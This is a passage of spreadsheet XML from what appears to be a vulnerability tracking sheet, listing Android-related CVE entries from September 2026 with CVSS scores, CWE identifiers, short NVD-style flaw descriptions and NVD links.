      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>CWE-1190, CWE-787</t>
        </is>
      </c>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28655</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S433"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T433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28657</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S434"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T434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28658</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28659</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr">
        <is>
          <t>google:android_xr</t>
        </is>
      </c>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28663</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S437"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T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28664</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28668</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45515</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S440"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T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45520</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S441"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T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45531</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49881</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S443"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T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49884</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S444"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T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49887</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S445"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T445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49918</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49919</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S447"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T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49927</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49932</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55273</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.001</v>
      </c>
